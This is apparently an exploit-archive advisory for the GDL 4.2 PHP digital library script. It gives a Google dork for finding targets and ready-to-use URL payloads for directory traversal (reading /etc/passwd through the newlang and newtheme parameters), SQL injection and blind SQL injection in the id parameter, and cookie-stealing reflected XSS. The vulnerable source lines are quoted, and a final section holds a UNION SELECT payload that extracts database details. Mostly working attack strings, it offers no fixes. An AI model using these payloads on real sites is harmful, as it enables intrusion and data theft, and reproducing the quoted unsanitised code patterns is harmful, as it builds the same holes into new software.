GDL 4.2 XSS / SQL Injection / Traversal

`-> Title : GDL 4.2 Multiple Vulnerabilities  
  
-> Down. Script : http://kmrg.itb.ac.id/ - http://kmrg.itb.ac.id/gdl42.zip  
  
-> Author : ByEge  
  
-> Home : http://byege.blogspot.com.tr/  
  
-> Tested : Apache/2.2.22 (Win32) PHP/5.4.3  
  
-> Date : 26/02/2014  
  
-> Google Dork : "Powered by GDL 4.2" And "gdl.php?mod=browse"  
  
-> Thanks : F0RTYS3V3N - Cyb3rking - ameN  
  
-> Keyfi : http://www.youtube.com/watch?v=wKGMk56zSPI --> Yaz dostum boşa geçmiş ömre yaşam denir mi ?  
  
-> Not : Kendini geliştirmek isteyen arkadaşlar kod analizi için kullanabilirsiniz scripti, bir çok güvenlik zaafiyeti var.  
  
  
###################################  
#Directory traversal vulnerability#  
###################################  
http://localhost/gdl.php?newlang=../../../../../../../../../../etc/passwd%00  
http://localhost/index.php?newlang=../../../../../../../../../../etc/passwd%00  
Line : gdl42/class/session.php 96 - 99 parameter : newlang  
  
  
// Setting bahasa  
$lang = $_COOKIE['gdl_lang'];  
$newlang = $_GET['newlang'];  
  
if (isset($newlang)) {  
if (file_exists("./lang/$newlang.php")) {  
setcookie("gdl_lang",$newlang,time()+($gdl_sys['page_caching'] * 60));  
$gdl_content->language=$newlang;  
} else {  
setcookie("gdl_lang",$gdl_sys['language'],time()+($gdl_sys['page_caching'] * 60));  
$gdl_content->language=$gdl_sys['language'];  
}  
  
} elseif (isset($lang)) {  
$gdl_content->language=$lang;  
}else{  
setcookie("gdl_lang",$gdl_sys['language'],time()+($gdl_sys['page_caching'] * 60));  
$gdl_content->language=$gdl_sys['language'];  
}  
}  
  
function set_theme(){  
global $gdl_content, $gdl_sys;  
--------------------------------------------------------------------------------------------------------------  
--------------------------------------------------------------------------------------------------------------  
http://localhost/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00  
http://localhost/index.php?newtheme=../../../../../../../../../../etc/passwd%00  
Line : gdl42/class/session.php 120 - 123 parameter : newtheme  
  
$theme = $_COOKIE['gdl_theme'];  
$newtheme = $_GET['newtheme'];  
  
if (isset($newtheme)) {  
if (file_exists("./theme/$newtheme/theme.php")) {  
setcookie("gdl_theme",$newtheme,time()+($gdl_sys['page_caching'] * 60));  
$gdl_content->theme=$newtheme;  
} else {  
setcookie("gdl_theme",$gdl_sys['theme'],time()+($gdl_sys['page_caching'] * 60));  
$gdl_content->theme=$gdl_sys['theme'];  
}  
  
} elseif (isset($theme)) {  
$gdl_content->theme=$theme;  
}else{  
setcookie("gdl_theme",$gdl_sys['theme'],time()+($gdl_sys['page_caching'] * 60));  
$gdl_content->theme=$gdl_sys['theme'];  
}  
  
}  
  
function login($userid,$password) {  
global $gdl_auth,$gdl_sys;  
--------------------------------------------------------------------------------------------------------------  
--------------------------------------------------------------------------------------------------------------  
#############################  
#SQL Injection vulnerability#  
#############################  
http://localhost/download.php?id=injecthere  
Line : gdl42/download.php 18 - 24 parameter : id  
  
$file_id = $_GET['id'];  
  
function download_redirect(){  
  
global $file_id,$gdl_db,$gdl_metadata,$gdl_publisher,$gdl_session,$gdl_publisher2;  
  
$dbres = $gdl_db->select("relation","part,path,identifier,uri","relation_id=$file_id");  
$file_target=@mysql_result($dbres,0,"path");  
$file_part=@mysql_result($dbres,0,"part");  
$publisher = $gdl_metadata->get_publisher(@mysql_result($dbres,0,"identifier"));  
  
--------------------------------------------------------------------------------------------------------------  
--------------------------------------------------------------------------------------------------------------  
###################################  
#Blind SQL Injection vulnerability#  
###################################  
http://localhost/gdl.php?mod=browse&newlang=english&op=comment&page=read&id=injecthere  
Line : gdl42/main.php 119 parameter : id  
if ((file_exists("./theme/".$gdl_content->theme."/".$gdl_content->theme."_print.css"))&& ($_GET['mod']== "browse") && ($_GET['op']=="read") && (! empty ($_GET['id'])))  
--------------------------------------------------------------------------------------------------------------  
--------------------------------------------------------------------------------------------------------------  
########################################  
#Cross site scripting xss vulnerability#  
########################################  
http://localhost/gdl.php?mod=search&action=ByEge&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK  
Line : module/search/function.php 38 parameter : keyword  
  
###############################################################################################################################################################################  
###############################################################################################################################################################################  
  
Test Vulnerability :  
http://server/download.php?id=null/**/and/**/true/**/UNION/**/SELECT/**/CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2--  
http://server/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00  
http://server/gdl.php?newlang=../../../../../../../../../../etc/passwd%00  
http://server/gdl.php?mod=search&action=folks&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK   
  
`